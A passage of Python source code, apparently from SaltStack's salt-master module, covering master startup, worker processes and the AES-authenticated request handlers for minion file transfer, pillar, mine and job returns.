mof_h if mof_s < mof_c: # There's room to raise the value. Raise it! log.info('Raising max open files value to %s', mof_c) resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h)) try: mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) log.info( 'New values for max open files soft/hard values: %s/%s', mof_s, mof_h ) except ValueError: # https://github.com/saltstack/salt/issues/1991#issuecomment-13025595 # A user under macOS reported that our 100000 default value is # still too high. log.critical( 'Failed to raise max open files setting to %s. If this ' 'value is too low, the salt-master will most likely fail ' 'to run properly.', mof_c ) def _pre_flight(self): ''' Run pre flight checks. If anything in this method fails then the master should not start up. ''' errors = [] critical_errors = [] try: os.chdir('/') except OSError as err: errors.append( 'Cannot change to root directory ({0})'.format(err) ) if self.opts.get('fileserver_verify_config', True): # Avoid circular import import salt.fileserver fileserver = salt.fileserver.Fileserver(self.opts) if not fileserver.servers: errors.append( 'Failed to load fileserver backends, the configured backends ' 'are: {0}'.format(', '.join(self.opts['fileserver_backend'])) ) else: # Run init() for all backends which support the function, to # double-check configuration try: fileserver.init() except salt.exceptions.FileserverConfigError as exc: critical_errors.append('{0}'.format(exc)) if not self.opts['fileserver_backend']: errors.append('No fileserver backends are configured') # Check to see if we need to create a pillar cache dir if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')): try: with salt.utils.files.set_umask(0o077): os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache')) except OSError: pass if self.opts.get('git_pillar_verify_config', True): try: git_pillars = [ x for x in self.opts.get('ext_pillar', []) if 'git' in x and not isinstance(x['git'], six.string_types) ] except TypeError: git_pillars = [] critical_errors.append( 'Invalid ext_pillar configuration. It is likely that the ' 'external pillar type was not specified for one or more ' 'external pillars.' ) if git_pillars: try: new_opts = copy.deepcopy(self.opts) import salt.pillar.git_pillar for repo in git_pillars: new_opts['ext_pillar'] = [repo] try: git_pillar = salt.utils.gitfs.GitPillar( new_opts, repo['git'], per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES, per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY, global_only=salt.pillar.git_pillar.GLOBAL_ONLY) except salt.exceptions.FileserverConfigError as exc: critical_errors.append(exc.strerror) finally: del new_opts if errors or critical_errors: for error in errors: log.error(error) for error in critical_errors: log.critical(error) log.critical('Master failed pre flight checks, exiting\n') sys.exit(salt.defaults.exitcodes.EX_GENERIC) def start(self): ''' Turn on the master server components ''' self._pre_flight() log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user()) enable_sigusr1_handler() enable_sigusr2_handler() self.__set_max_open_files() # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): # Setup the secrets here because the PubServerChannel may need # them as well. SMaster.secrets['aes'] = { 'secret': multiprocessing.Array( ctypes.c_char, salt.utils.stringutils.to_bytes( salt.crypt.Crypticle.generate_key_string() ) ), 'reload': salt.crypt.Crypticle.generate_key_string } log.info('Creating master process manager') # Since there are children having their own ProcessManager we should wait for kill more time. self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5) pub_channels = [] log.info('Creating master publisher process') log_queue = salt.log.setup.get_multiprocessing_logging_queue() for _, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.pre_fork(self.process_manager, kwargs={'log_queue': log_queue}) pub_channels.append(chan) log.info('Creating master event publisher process') self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,)) if self.opts.get('reactor'): if isinstance(self.opts['engines'], list): rine = False for item in self.opts['engines']: if 'reactor' in item: rine = True break if not rine: self.opts['engines'].append({'reactor': {}}) else: if 'reactor' not in self.opts['engines']: log.info('Enabling the reactor engine') self.opts['engines']['reactor'] = {} salt.engines.start_engines(self.opts, self.process_manager) # must be after channels log.info('Creating master maintenance process') self.process_manager.add_process(Maintenance, args=(self.opts,)) if self.opts.get('event_return'): log.info('Creating master event return process') self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,)) ext_procs = self.opts.get('ext_processes', []) for proc in ext_procs: log.info('Creating ext_processes process: %s', proc) try: mod = '.'.join(proc.split('.')[:-1]) cls = proc.split('.')[-1] _tmp = __import__(mod, globals(), locals(), [cls], -1) cls = _tmp.__getattribute__(cls) self.process_manager.add_process(cls, args=(self.opts,)) except Exception: # pylint: disable=broad-except log.error('Error creating ext_processes process: %s', proc) if HAS_HALITE and 'halite' in self.opts: log.info('Creating master halite process') self.process_manager.add_process(Halite, args=(self.opts['halite'],)) # TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there) if self.opts['con_cache']: log.info('Creating master concache process') self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,)) # workaround for issue #16315, race condition log.debug('Sleeping for two seconds to let concache rest') time.sleep(2) log.info('Creating master request server process') kwargs = {} if salt.utils.platform.is_windows(): kwargs['log_queue'] = log_queue kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level() kwargs['secrets'] = SMaster.secrets self.process_manager.add_process( ReqServer, args=(self.opts, self.key, self.master_key), kwargs=kwargs, name='ReqServer') self.process_manager.add_process( FileserverUpdate, args=(self.opts,)) # Fire up SSDP discovery publisher if self.opts['discovery']: if salt.utils.ssdp.SSDPDiscoveryServer.is_available(): self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer( port=self.opts['discovery']['port'], listen_ip=self.opts['interface'], answer={'mapping': self.opts['discovery'].get('mapping', {})}).run) else: log.error('Unable to load SSDP: asynchronous IO is not available.') if sys.version_info.major == 2: log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.') # Install the SIGINT/SIGTERM handlers if not done so far if signal.getsignal(signal.SIGINT) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGINT, self._handle_signals) if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGTERM, self._handle_signals) self.process_manager.run() def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument # escalate the signals to the process manager self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) # kill any remaining processes self.process_manager.kill_children() time.sleep(1) sys.exit(0) class Halite(salt.utils.process.SignalHandlingProcess): ''' Manage the Halite server ''' def __init__(self, hopts, **kwargs): ''' Create a halite instance :param dict hopts: The halite options ''' super(Halite, self).__init__(**kwargs) self.hopts = hopts # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['hopts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) def __getstate__(self): return { 'hopts': self.hopts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def run(self): ''' Fire up halite! ''' salt.utils.process.appendproctitle(self.__class__.__name__) halite.start(self.hopts) class ReqServer(salt.utils.process.SignalHandlingProcess): ''' Starts up the master request server, minions send results to this interface. ''' def __init__(self, opts, key, mkey, secrets=None, **kwargs): ''' Create a request server :param dict opts: The salt options dictionary :key dict: The user starting the server and the AES key :mkey dict: The user starting the server and the RSA key :rtype: ReqServer :returns: Request server ''' super(ReqServer, self).__init__(**kwargs) self.opts = opts self.master_key = mkey # Prepare the AES key self.key = key self.secrets = secrets # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['opts'], state['key'], state['mkey'], secrets=state['secrets'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) def __getstate__(self): return { 'opts': self.opts, 'key': self.key, 'mkey': self.master_key, 'secrets': self.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument self.destroy(signum) super(ReqServer, self)._handle_signals(signum, sigframe) def __bind(self): ''' Binds the reply server ''' if self.log_queue is not None: salt.log.setup.set_multiprocessing_logging_queue(self.log_queue) if self.log_queue_level is not None: salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level) salt.log.setup.setup_multiprocessing_logging(self.log_queue) if self.secrets is not None: SMaster.secrets = self.secrets dfn = os.path.join(self.opts['cachedir'], '.dfn') if os.path.isfile(dfn): try: if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): # Cannot delete read-only files on Windows. os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) os.remove(dfn) except os.error: pass # Wait for kill should be less then parent's ProcessManager. self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager', wait_for_kill=1) req_channels = [] tcp_only = True for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.ReqServerChannel.factory(opts) chan.pre_fork(self.process_manager) req_channels.append(chan) if transport != 'tcp': tcp_only = False kwargs = {} if salt.utils.platform.is_windows(): kwargs['log_queue'] = self.log_queue kwargs['log_queue_level'] = self.log_queue_level # Use one worker thread if only the TCP transport is set up on # Windows and we are using Python 2. There is load balancer # support on Windows for the TCP transport when using Python 3. if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1: log.warning('TCP transport supports only 1 worker on Windows ' 'when using Python 2.') self.opts['worker_threads'] = 1 # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): for ind in range(int(self.opts['worker_threads'])): name = 'MWorker-{0}'.format(ind) self.process_manager.add_process(MWorker, args=(self.opts, self.master_key, self.key, req_channels, name), kwargs=kwargs, name=name) self.process_manager.run() def run(self): ''' Start up the ReqServer ''' self.__bind() def destroy(self, signum=signal.SIGTERM): if hasattr(self, 'process_manager'): self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) self.process_manager.kill_children() # pylint: disable=W1701 def __del__(self): self.destroy() # pylint: enable=W1701 class MWorker(salt.utils.process.SignalHandlingProcess): ''' The worker multiprocess instance to manage the backend operations for the salt master. ''' def __init__(self, opts, mkey, key, req_channels, name, **kwargs): ''' Create a salt master worker process :param dict opts: The salt options :param dict mkey: The user running the salt master and the AES key :param dict key: The user running the salt master and the RSA key :rtype: MWorker :return: Master worker ''' kwargs['name'] = name self.name = name super(MWorker, self).__init__(**kwargs) self.opts = opts self.req_channels = req_channels self.mkey = mkey self.key = key self.k_mtime = 0 self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = time.time() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. def __setstate__(self, state): super(MWorker, self).__init__( log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) self.opts = state['opts'] self.req_channels = state['req_channels'] self.mkey = state['mkey'] self.key = state['key'] self.k_mtime = state['k_mtime'] SMaster.secrets = state['secrets'] def __getstate__(self): return { 'opts': self.opts, 'req_channels': self.req_channels, 'mkey': self.mkey, 'key': self.key, 'k_mtime': self.k_mtime, 'secrets': SMaster.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): for channel in getattr(self, 'req_channels', ()): channel.close() super(MWorker, self)._handle_signals(signum, sigframe) def __bind(self): ''' Bind to the local port ''' # using ZMQIOLoop since we *might* need zmq in there install_zmq() self.io_loop = ZMQDefaultLoop() self.io_loop.make_current() for req_channel in self.req_channels: req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily? try: self.io_loop.start() except (KeyboardInterrupt, SystemExit): # Tornado knows what to do pass @salt.ext.tornado.gen.coroutine def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server Example cleartext payload generated for 'salt myminion test.ping': {'enc': 'clear', 'load': {'arg': [], 'cmd': 'publish', 'fun': 'test.ping', 'jid': '', 'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj', 'kwargs': {'show_jid': False, 'show_timeout': False}, 'ret': '', 'tgt': 'myminion', 'tgt_type': 'glob', 'user': 'root'}} :param dict payload: The payload route to the appropriate handler ''' key = payload['enc'] load = payload['load'] ret = {'aes': self._handle_aes, 'clear': self._handle_clear}[key](load) raise salt.ext.tornado.gen.Return(ret) def _post_stats(self, start, cmd): ''' Calculate the master stats and fire events with stat info ''' end = time.time() duration = end - start self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs'] if end - self.stat_clock > self.opts['master_stats_event_iter']: # Fire the event with the stats and wipe the tracker self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 'stats')) self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = end def _handle_clear(self, load): ''' Process a cleartext command :param dict load: Cleartext payload :return: The result of passing the load to a function in ClearFuncs corresponding to the command specified in the load's 'cmd' key. ''' log.trace('Clear payload received with command %s', load['cmd']) cmd = load['cmd'] method = self.clear_funcs.get_method(cmd) if not method: return {}, {'fun': 'send_clear'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 ret = method(load), {'fun': 'send_clear'} if self.opts['master_stats']: self._post_stats(start, cmd) return ret def _handle_aes(self, data): ''' Process a command sent via an AES key :param str load: Encrypted payload :return: The result of passing the load to a function in AESFuncs corresponding to the command specified in the load's 'cmd' key. ''' if 'cmd' not in data: log.error('Received malformed command %s', data) return {} cmd = data['cmd'] log.trace('AES payload received with command %s', data['cmd']) method = self.aes_funcs.get_method(cmd) if not method: return {}, {'fun': 'send'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 def run_func(data): return self.aes_funcs.run_func(data['cmd'], data) with StackContext(functools.partial(RequestContext, {'data': data, 'opts': self.opts})): ret = run_func(data) if self.opts['master_stats']: self._post_stats(start, cmd) return ret def run(self): ''' Start a Master Worker ''' salt.utils.process.appendproctitle(self.name) self.clear_funcs = ClearFuncs( self.opts, self.key, ) self.aes_funcs = AESFuncs(self.opts) salt.utils.crypt.reinit_crypto() self.__bind() class TransportMethods(object): ''' Expose methods to the transport layer, methods with their names found in the class attribute 'expose_methods' will be exposed to the transport layer via 'get_method'. ''' expose_methods = () def get_method(self, name): ''' Get a method which should be exposed to the transport layer ''' if name in self.expose_methods: try: return getattr(self, name) except AttributeError: log.error("Expose method not found: %s", name) else: log.error("Requested method not exposed: %s", name) # TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests class AESFuncs(TransportMethods): ''' Set up functions that are available when the load is encrypted with AES ''' expose_methods = ( 'verify_minion', '_master_tops', '_ext_nodes', '_master_opts', '_mine_get', '_mine', '_mine_delete', '_mine_flush', '_file_recv', '_pillar', '_minion_event', '_handle_minion_event', '_return', '_syndic_return', 'minion_runner', 'pub_ret', 'minion_pub', 'minion_publish', 'revoke_auth', 'run_func', '_serve_file', '_file_find', '_file_hash', '_file_find_and_stat', '_file_list', '_file_list_emptydirs', '_dir_list', '_symlink_list', '_file_envs', ) def __init__(self, opts): ''' Create a new AESFuncs :param dict opts: The salt options :rtype: AESFuncs :returns: Instance for handling AES operations ''' self.opts = opts self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) self.serial = salt.payload.Serial(opts) self.ckminions = salt.utils.minions.CkMinions(opts) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Create the master minion to access the external job cache self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) self.__setup_fileserver() self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts) def __setup_fileserver(self): ''' Set the local file objects from the file server interface ''' # Avoid circular import import salt.fileserver self.fs_ = salt.fileserver.Fileserver(self.opts) self._serve_file = self.fs_.serve_file self._file_find = self.fs_._find_file self._file_hash = self.fs_.file_hash self._file_hash_and_stat = self.fs_.file_hash_and_stat self._file_list = self.fs_.file_list self._file_list_emptydirs = self.fs_.file_list_emptydirs self._dir_list = self.fs_.dir_list self._symlink_list = self.fs_.symlink_list self._file_envs = self.fs_.file_envs def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. ''' if not salt.utils.verify.valid_id(self.opts, id_): return False pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) try: pub = salt.crypt.get_rsa_pub_key(pub_path) except (IOError, OSError): log.warning( 'Salt minion claiming to be %s attempted to communicate with ' 'master, but key could not be read and verification was denied.', id_ ) return False except (ValueError, IndexError, TypeError) as err: log.error('Unable to load public key "%s": %s', pub_path, err) try: if salt.crypt.public_decrypt(pub, token) == b'salt': return True except ValueError as err: log.error('Unable to decrypt token: %s', err) log.error( 'Salt minion claiming to be %s has attempted to communicate with ' 'the master and could not be verified', id_ ) return False def verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. ''' return self.__verify_minion(id_, token) def __verify_minion_publish(self, clear_load): ''' Verify that the passed information authorized a minion to execute :param dict clear_load: A publication load from a minion :rtype: bool :return: A boolean indicating if the minion is allowed to publish the command in the load ''' # Verify that the load is valid if 'peer' not in self.opts: return False if not isinstance(self.opts['peer'], dict): return False if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')): return False # If the command will make a recursive publish don't run if clear_load['fun'].startswith('publish.'): return False # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning( 'Minion id %s is not who it says it is and is attempting ' 'to issue a peer command', clear_load['id'] ) return False clear_load.pop('tok') perms = [] for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.extend(self.opts['peer'][match]) if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ # finally, check the auth of the load return self.ckminions.auth_check( perms, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), publish_validate=True) def __verify_load(self, load, verify_keys): ''' A utility function to perform common verification steps. :param dict load: A payload received from a minion :param list verify_keys: A list of strings that should be present in a given load :rtype: bool :rtype: dict :return: The original load (except for the token) if the load can be verified. False if the load is invalid. ''' if any(key not in load for key in verify_keys): return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning('Minion id %s is not who it says it is!', load['id']) return False if 'tok' in load: load.pop('tok') return load def _master_tops(self, load): ''' Return the results from an external node classifier if one is specified :param dict load: A payload received from a minion :return: The results from an external node classifier ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} return self.masterapi._master_tops(load, skip_verify=True) # Needed so older minions can request master_tops _ext_nodes = _master_tops def _master_opts(self, load): ''' Return the master options to the minion :param dict load: A payload received from a minion :rtype: dict :return: The master options ''' mopts = {} file_roots = {} envs = self._file_envs() for saltenv in envs: if saltenv not in file_roots: file_roots[saltenv] = [] mopts['file_roots'] = file_roots mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy'] mopts['env_order'] = self.opts['env_order'] mopts['default_top'] = self.opts['default_top'] if load.get('env_only'): return mopts mopts['renderer'] = self.opts['renderer'] mopts['failhard'] = self.opts['failhard'] mopts['state_top'] = self.opts['state_top'] mopts['state_top_saltenv'] = self.opts['state_top_saltenv'] mopts['nodegroups'] = self.opts['nodegroups'] mopts['state_auto_order'] = self.opts['state_auto_order'] mopts['state_events'] = self.opts['state_events'] mopts['state_aggregate'] = self.opts['state_aggregate'] mopts['jinja_env'] = self.opts['jinja_env'] mopts['jinja_sls_env'] = self.opts['jinja_sls_env'] mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks'] mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks'] return mopts def _mine_get(self, load): ''' Gathers the data from the specified minions' mine :param dict load: A payload received from a minion :rtype: dict :return: Mine data from the specified minions ''' load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_get(load, skip_verify=True) def _mine(self, load): ''' Store the mine data :param dict load: A payload received from a minion :rtype: bool :return: True if the data has been stored in the mine ''' load = self.__verify_load(load, ('id', 'data', 'tok')) if load is False: return {} return self.masterapi._mine(load, skip_verify=True) def _mine_delete(self, load): ''' Allow the minion to delete a specific function from its own mine :param dict load: A payload received from a minion :rtype: bool :return: Boolean indicating whether or not the given function was deleted from the mine ''' load = self.__verify_load(load, ('id', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_delete(load) def _mine_flush(self, load): ''' Allow the minion to delete all of its own mine contents :param dict load: A payload received from a minion ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} else: return self.masterapi._mine_flush(load, skip_verify=True) def _file_recv(self, load): ''' Allows minions to send files to the master, files are sent to the master file cache ''' if any(key not in load for key in ('id', 'path', 'loc')): return False if not isinstance(load['path'], list): return False if not self.opts['file_recv']: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False file_recv_max_size = 1024*1024 * self.opts['file_recv_max_size'] if 'loc' in load and load['loc'] < 0: log.error('Invalid file pointer: load[loc] < 0') return False if len(load['data']) + load.get('loc', 0) > file_recv_max_size: log.error( 'file_recv_max_size limit of %d MB exceeded! %s will be ' 'truncated. To successfully push this file, adjust ' 'file_recv_max_size to an integer (in MB) large enough to ' 'accommodate it.', file_recv_max_size, load['path'] ) return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning('Minion id %s is not who it says it is!', load['id']) return {} load.pop('tok') # Join path sep_path = os.sep.join(load['path']) # Path normalization should have been done by the sending # minion but we can't guarantee it. Re-do it here. normpath = os.path.normpath(sep_path) # Ensure that this safety check is done after the path # have been normalized. if os.path.isabs(normpath) or '../' in load['path']: # Can overwrite master files!! return False cpath = os.path.join( self.opts['cachedir'], 'minions', load['id'], 'files', normpath) # One last safety check here if not os.path.normpath(cpath).startswith(self.opts['cachedir']): log.warning( 'Attempt to write received file outside of master cache ' 'directory! Requested path: %s. Access denied.', cpath ) return False cdir = os.path.dirname(cpath) if not os.path.isdir(cdir): try: os.makedirs(cdir) except os.error: pass if os.path.isfile(cpath) and load['loc'] != 0: mode = 'ab' else: mode = 'wb' with salt.utils.files.fopen(cpath, mode) as fp_: if load['loc']: fp_.seek(load['loc']) fp_.write(salt.utils.stringutils.to_bytes(load['data'])) return True def _pillar(self, load): ''' Return the pillar data for the minion :param dict load: Minion payload :rtype: dict :return: The pillar data for the minion ''' if any(key not in load for key in ('id', 'grains')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False load['grains']['id'] = load['id'] pillar = salt.pillar.get_pillar( self.opts, load['grains'], load['id'], load.get('saltenv', load.get('env')), ext=load.get('ext'), pillar_override=load.get('pillar_override', {}), pillarenv=load.get('pillarenv'), extra_minion_data=load.get('extra_minion_data')) data = pillar.compile_pillar() self.fs_.update_opts() if self.opts.get('minion_data_cache', False): self.masterapi.cache.store('minions/{0}'.format(load['id']), 'data', {'grains': load['grains'], 'pillar': data}) if self.opts.get('minion_data_cache_events') is True: self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion')) return data def _minion_event(self, load): ''' Receive an event from the minion and fire it on the master event interface :param dict load: The minion payload ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} # Route to master event bus self.masterapi._minion_event(load) # Process locally self._handle_minion_event(load) def _handle_minion_event(self, load): ''' Act on specific events from minions ''' id_ = load['id'] if load.get('tag', '') == '_salt_error': log.error( 'Received minion error from [%s]: %s', id_, load['data']['message'] ) for event in load.get('events', []): event_data = event.get('data', {}) if 'minions' in event_data: jid = event_data.get('jid') if not jid: continue minions = event_data['minions'] try: salt.utils.job.store_minions( self.opts, jid, minions, mminion=self.mminion, syndic_id=id_) except (KeyError, salt.exceptions.SaltCacheError) as exc: log.error( 'Could not add minion(s) %s for job %s: %s', minions, jid, exc ) def _return(self, load): ''' Handle the return data sent from the minions. Takes the return, verifies it and fires it on the master event bus. Typically, this event is consumed by the Salt CLI waiting on the other end of the event bus but could be heard by any listener on the bus. :param dict load: The minion payload ''' if self.opts['require_minion_sign_messages'] and 'sig' not in load: log.critical( '_return: Master is requiring minions to sign their ' 'messages, but there is no signature in this payload from ' '%s.', load['id'] ) return False if 'sig' in load: log.trace('Verifying signed event publish from minion') sig = load.pop('sig') this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id'])) serialized_load = salt.serializers.msgpack.serialize(load) if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig): log.info('Failed to verify event signature from minion %s.', load['id']) if self.opts['drop_messages_signature_fail']: log.critical( 'drop_messages_signature_fail is enabled, dropping ' 'message from %s', load['id'] ) return False else: log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.') load['sig'] = sig try: salt.utils.job.store_job( self.opts, load, event=self.event, mminion=self.mminion) except salt.exceptions.SaltCacheError: log.error('Could not store job information for load: %s', load) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. :param dict load: The minion payload ''' loads = load.get('load') if not isinstance(loads, list): loads = [load] # support old syndics not aggregating returns for load in loads: # Verify the load if any(key not in load for key in ('return', 'jid', 'id')): continue # if we have a load, save it if load.get('load'): fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load['jid'], load['load']) # Register the syndic syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id']) if not os.path.exists(syndic_cache_path): path_name = os.path.split(syndic_cache_path)[0] if not os.path.exists(path_name): os.makedirs(path_name) with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh: wfh.write('') # Format individual return loads for key, item in six.iteritems(load['return']): ret = {'jid': load['jid'], 'id': key} ret.update(item) if 'master_id' in load: ret['master_id'] = load['master_id'] if 'fun' in load: ret['fun'] = load['fun'] if 'arg' in load: ret['fun_args'] = load['arg'] if 'out' in load: ret['out'] = load['out'] if 'sig' in load: ret['sig'] = load['sig'] self._return(ret) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data :param dict clear_load: The minion payload :rtype: dict :return: The runner function data ''' load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok')) if load is False: return {} else: return self.masterapi.minion_runner(clear_load) def pub_ret(self, load): ''' Request the return data from a specific jid, only allowed if the requesting minion also initialted the execution. :param dict load: The minion payload :rtype: dict :return: Return data corresponding to a given JID ''' load = self.__verify_load(load, ('jid', 'id', 'tok')) if load is False: return {} # Check that this minion can access this data auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, six.text_type(load['jid'])) with salt.utils.files.fopen(jid_fn, 'r') as fp_: if not load['id'] == fp_.read(): return {} # Grab the latest and return return self.local.get_cache_returns(load['jid']) def minion_pub(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands: .. code-block:: bash peer: foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion pay ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_pub(clear_load) def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands. peer: .. code-block:: bash foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion payload ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_publish(clear_load) def revoke_auth(self, load): ''' Allow a minion to request revocation of its own key :param dict load: The minion payload :rtype: dict :return: If the load is invalid, it may be returned. No key operation is performed. :rtype: bool :return: True if key was revoked, False if not ''' load = self.__verify_load(load, ('id', 'tok')) if not self.opts.get('allow_minion_key_revoke', False): log.warning( 'Minion %s requested key revoke, but allow_minion_key_revoke ' 'is set to False', load['id'] ) return load if load is False: return load else: return self.masterapi.revoke_auth(load) def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption :param function func: The function to run :return: The result of the master function that was called ''' # Don't honor private functions if func.startswith('__'): # TODO: return some error? Seems odd to return {} return {}, {'fun': 'send'} # Run the func if hasattr(self, func): try: start = time.time() ret = getattr(self, func)(load) log.trace( 'Master function call %s took %s seconds', func, time.time() - start ) except Exception: # pylint: disable=broad-except ret = '' log.error('Error in function %s:\n', func, exc_info=True) else: log.error( 'Received function %s which is unavailable on the master, ' 'returning False', func ) return False, {'fun': 'send'} # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) if func == '_return': return ret, {'fun': 'send'} if func == '_pillar' and 'id' in load: if load.get('ver') != 